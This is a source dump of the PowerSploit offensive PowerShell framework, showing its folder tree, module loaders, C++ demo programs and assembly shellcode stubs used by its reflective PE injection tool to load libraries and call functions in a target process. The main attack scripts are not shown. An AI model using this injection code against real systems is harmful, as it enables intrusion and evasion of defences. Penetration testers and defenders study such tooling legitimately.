├── Capstone ├── lib │ ├── place_capstone.dll_here │ ├── x64 │ │ ├── place_64-bit_libcapstone.dll_here │ │ └── libcapstone.dll │ ├── x86 │ │ ├── place_32-bit_libcapstone.dll_here │ │ └── libcapstone.dll │ └── capstone.dll ├── README ├── Capstone.psd1 ├── LICENSE.TXT ├── Get-CSDisassembly.format.ps1xml └── Capstone.psm1 ├── Recon ├── Recon.psm1 ├── Dictionaries │ ├── generic.txt │ ├── sharepoint.txt │ └── admin.txt ├── Usage.md ├── Recon.psd1 └── Get-HttpStatus.ps1 ├── PETools ├── PETools.psm1 ├── Usage.md ├── Get-LibSymbols.format.ps1xml └── PETools.psd1 ├── CodeExecution ├── CodeExecution.psm1 ├── Invoke-ReflectivePEInjection_Resources │ ├── DemoDLL │ │ ├── DemoDLL │ │ │ ├── stdafx.cpp │ │ │ ├── targetver.h │ │ │ ├── dllmain.cpp │ │ │ ├── stdafx.h │ │ │ ├── DemoDLL.h │ │ │ ├── DemoDLL.vcxproj.filters │ │ │ ├── ReadMe.txt │ │ │ └── DemoDLL.cpp │ │ └── DemoDLL.sln │ ├── DemoExe │ │ ├── DemoExe_MD │ │ │ ├── stdafx.cpp │ │ │ ├── targetver.h │ │ │ ├── stdafx.h │ │ │ ├── DemoExe_MD.cpp │ │ │ ├── DemoExe_MD.vcxproj.filters │ │ │ └── ReadMe.txt │ │ ├── DemoExe_MDd │ │ │ ├── stdafx.cpp │ │ │ ├── targetver.h │ │ │ ├── stdafx.h │ │ │ ├── DemoExe_MDd.cpp │ │ │ ├── DemoExe_MDd.vcxproj.filters │ │ │ └── ReadMe.txt │ │ └── DemoExe.sln │ ├── ExeToInjectInTo │ │ ├── ExeToInjectInTo │ │ │ ├── stdafx.cpp │ │ │ ├── ExeToInjectInTo.cpp │ │ │ ├── targetver.h │ │ │ ├── stdafx.h │ │ │ ├── ExeToInjectInTo.vcxproj.filters │ │ │ ├── ReadMe.txt │ │ │ └── ExeToInjectInTo.vcxproj │ │ └── ExeToInjectInTo.sln │ ├── Shellcode │ │ ├── x86 │ │ │ ├── ExitThread.asm │ │ │ ├── CallDllMain.asm │ │ │ └── GetProcAddress.asm │ │ ├── x64 │ │ │ ├── ExitThread.asm │ │ │ ├── CallDllMain.asm │ │ │ ├── LoadLibraryA.asm │ │ │ └── GetFuncAddress.asm │ │ └── readme.txt │ └── DemoDLL_RemoteProcess │ │ ├── DemoDLL_RemoteProcess │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── DemoDLL_RemoteProcess.cpp │ │ ├── stdafx.h │ │ ├── dllmain.cpp │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters │ │ └── ReadMe.txt │ │ └── DemoDLL_RemoteProcess.sln ├── Usage.md ├── CodeExecution.psd1 └── Watch-BlueScreen.ps1 ├── Exfiltration ├── Exfiltration.psm1 ├── LogonUser │ └── LogonUser │ │ ├── logon │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── dllmain.cpp │ │ ├── stdafx.h │ │ ├── logon.vcxproj.filters │ │ └── ReadMe.txt │ │ ├── LogonUser │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ ├── LogonUser.vcxproj.filters │ │ ├── ReadMe.txt │ │ └── LogonUser.cpp │ │ └── LogonUser.sln ├── NTFSParser │ ├── NTFSParser │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ ├── NTFS.h │ │ ├── NTFSParser.cpp │ │ ├── ReadMe.txt │ │ └── NTFSParser.vcxproj.filters │ ├── NTFSParserDLL │ │ ├── stdafx.cpp │ │ ├── targetver.h │ │ ├── stdafx.h │ │ ├── NTFS.h │ │ ├── dllmain.cpp │ │ ├── NTFSParserDLL.vcxproj.filters │ │ ├── ReadMe.txt │ │ └── NTFSParserDLL.cpp │ └── NTFSParser.sln ├── Usage.md ├── Exfiltration.psd1 ├── Get-TimedScreenshot.ps1 └── Out-Minidump.ps1 ├── AntivirusBypass ├── AntivirusBypass.psm1 ├── Usage.md └── AntivirusBypass.psd1 ├── ReverseEngineering ├── ReverseEngineering.psm1 ├── Usage.md ├── ProcessModuleTrace.format.ps1xml ├── Get-ILDisassembly.format.ps1xml ├── ConvertTo-String.ps1 ├── New-Object.ps1 ├── Get-Entropy.ps1 ├── Get-Strings.ps1 ├── ProcessModuleTrace.ps1 ├── ReverseEngineering.psd1 └── Get-MethodAddress.ps1 ├── ScriptModification ├── ScriptModification.psm1 ├── Usage.md ├── Out-CompressedDll.ps1 ├── ScriptModification.psd1 ├── Out-EncryptedScript.ps1 └── Remove-Comments.ps1 ├── PowerSploit.psm1 ├── Persistence ├── Persistence.psm1 ├── Usage.md ├── Persistence.psd1 ├── New-UserPersistenceOptions.ps1 └── New-ElevatedPersistenceOptions.ps1 ├── LICENSE ├── Staging └── Get-MacAttribute.ps1 ├── .gitignore └── PowerSploit.psd1 /Capstone/lib/place_capstone.dll_here: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Capstone/lib/x64/place_64-bit_libcapstone.dll_here: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Capstone/lib/x86/place_32-bit_libcapstone.dll_here: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Recon/Recon.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /PETools/PETools.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /CodeExecution/CodeExecution.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /Exfiltration/Exfiltration.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /AntivirusBypass/AntivirusBypass.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /Capstone/lib/capstone.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Capstone/lib/capstone.dll -------------------------------------------------------------------------------- /ReverseEngineering/ReverseEngineering.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /ScriptModification/ScriptModification.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /Recon/Dictionaries/generic.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Recon/Dictionaries/generic.txt -------------------------------------------------------------------------------- /Capstone/lib/x64/libcapstone.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Capstone/lib/x64/libcapstone.dll -------------------------------------------------------------------------------- /Capstone/lib/x86/libcapstone.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Exploit-install/PowerSploit/HEAD/Capstone/lib/x86/libcapstone.dll -------------------------------------------------------------------------------- /PowerSploit.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName -DisableNameChecking } 2 | -------------------------------------------------------------------------------- /Persistence/Persistence.psm1: -------------------------------------------------------------------------------- 1 | . (Join-Path $PSScriptRoot New-ElevatedPersistenceOptions.ps1) 2 | . (Join-Path $PSScriptRoot New-UserPersistenceOptions.ps1) 3 | . (Join-Path $PSScriptRoot Add-Persistence.ps1) 4 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // logon.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // NTFSParser.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // LogonUser.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // NTFSParserDLL.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoDLL.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoExe_MD.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoExe_MDd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // ExeToInjectInTo.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Set a var to 1, let PS know the EXE is exiting 6 | mov ebx, 0x41414141 7 | mov [ebx], byte 0x01 8 | 9 | ; Call exitthread instead of exit process 10 | sub esp, 0x20 11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment 12 | mov ebx, 0x41414141 13 | call ebx 14 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp: -------------------------------------------------------------------------------- 1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Press enter to close.\n"); 12 | getchar(); 13 | 14 | return 0; 15 | } 16 | 17 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Set a var to 1, let PS known exe is exiting 7 | mov rbx, 0x4141414141414141 8 | mov [rbx], byte 0x01 9 | 10 | ; Call exitthread instead of exitprocess 11 | sub rsp, 0xc0 12 | and sp, 0xFFf0 ; Needed for stack alignment 13 | mov rbx, 0x4141414141414141 14 | call rbx 15 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | // TODO: reference additional headers your program requires here 18 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Get stack setup 6 | push rbx 7 | mov rbx, rsp 8 | and sp, 0xff00 9 | 10 | ; Call DllMain 11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell 12 | mov rdx, 0x1 ; PROCESS_ATTACH 13 | mov r8, 0x0 ; NULL 14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS 15 | call rax 16 | 17 | ; Fix stack 18 | mov rsp, rbx 19 | pop rbx 20 | ret 21 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | case DLL_THREAD_ATTACH: 13 | case DLL_THREAD_DETACH: 14 | case DLL_PROCESS_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | 19 | 20 | // TODO: reference additional headers your program requires here 21 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt: -------------------------------------------------------------------------------- 1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning. 2 | 3 | Compile: 4 | x64: 5 | nasm -f elf64 FileName.asm 6 | ld -o FileName FileName.o 7 | objdump -M intel -d FileName 8 | 9 | x86: 10 | nasm FileName.asm 11 | ld -o FileName FileName.o 12 | objdump -M intel -d FileName -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | case DLL_THREAD_ATTACH: 13 | case DLL_THREAD_DETACH: 14 | case DLL_PROCESS_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Get stack setup 6 | push ebx 7 | mov ebx, esp 8 | and esp, 0xfffffff0 9 | 10 | ; Call DllMain 11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell 12 | mov edx, 0x1 ; PROCESS_ATTACH 13 | mov eax, 0x0 ; NULL 14 | push eax 15 | push edx 16 | push ecx 17 | mov eax, 0x41414141 ; Address of DllMain, set by PS 18 | call eax 19 | 20 | ; Fix stack 21 | mov esp, ebx 22 | pop ebx 23 | ret 24 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | // TODO: reference additional headers your program requires here 19 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp: -------------------------------------------------------------------------------- 1 | // DemoExe.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Exe loaded! Printing argc and argv\n\n"); 12 | 13 | printf("Argc: %d\n", argc); 14 | printf("ArgvAddress: %d\n", argv); 15 | 16 | for (int i = 0; i < argc; i++) 17 | { 18 | wprintf(L"Argv: %s\n", argv[i]); 19 | } 20 | 21 | printf("Exiting exe\n"); 22 | 23 | return 0; 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save rsp and setup stack for function call 7 | push rbx 8 | mov rbx, rsp 9 | sub rsp, 0x20 10 | and sp, 0xffc0 11 | 12 | ; Call LoadLibraryA 13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS 14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS 15 | call rdx 16 | 17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS 18 | mov [rdx], rax 19 | 20 | ; Fix stack 21 | mov rsp, rbx 22 | pop rbx 23 | ret 24 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp: -------------------------------------------------------------------------------- 1 | // DemoExe.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Exe loaded! Printing argc and argv\n\n"); 12 | 13 | printf("Argc: %d\n", argc); 14 | printf("ArgvAddress: %d\n", argv); 15 | 16 | for (int i = 0; i < argc; i++) 17 | { 18 | wprintf(L"Argv: %s\n", argv[i]); 19 | } 20 | 21 | printf("Exiting exe\n"); 22 | 23 | return 0; 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /Persistence/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Persistence` 7 | 8 | To see the commands imported, type `Get-Command -Module Persistence` 9 | 10 | For help on each individual command, Get-Help is your friend. -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | 20 | // TODO: reference additional headers your program requires here 21 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | using namespace std; 7 | 8 | extern "C" __declspec( dllexport ) void VoidFunc(); 9 | 10 | 11 | extern "C" __declspec( dllexport ) void VoidFunc() 12 | { 13 | ofstream myfile; 14 | _mkdir("c:\\ReflectiveLoaderTest"); 15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt"); 16 | myfile << "Dll Void function successfully called.\n"; 17 | myfile.close(); 18 | return; 19 | } -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | // TODO: reference additional headers your program requires here 20 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save state of ebx and stack 7 | push ebx 8 | mov ebx, esp 9 | 10 | ; Align stack 11 | and esp, 0xffffffc0 12 | 13 | ; Call GetProcAddress 14 | mov eax, 0x41414141 ; DllHandle, supplied by PS 15 | mov ecx, 0x41414141 ; Function name, supplied by PS 16 | push ecx 17 | push eax 18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS 19 | call eax 20 | 21 | ; Write GetProcAddress return value to an address supplied by PS 22 | mov ecx, 0x41414141 ; Address supplied by PS 23 | mov [ecx], eax 24 | 25 | ; Fix stack 26 | mov esp, ebx 27 | pop ebx 28 | ret 29 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include "targetver.h" 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | 24 | 25 | // TODO: reference additional headers your program requires here 26 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save state of rbx and stack 7 | push rbx 8 | mov rbx, rsp 9 | 10 | ; Set up stack for function call to GetProcAddress 11 | sub rsp, 0x20 12 | and sp, 0xffc0 13 | 14 | ; Call getprocaddress 15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS 16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS 17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS 18 | call 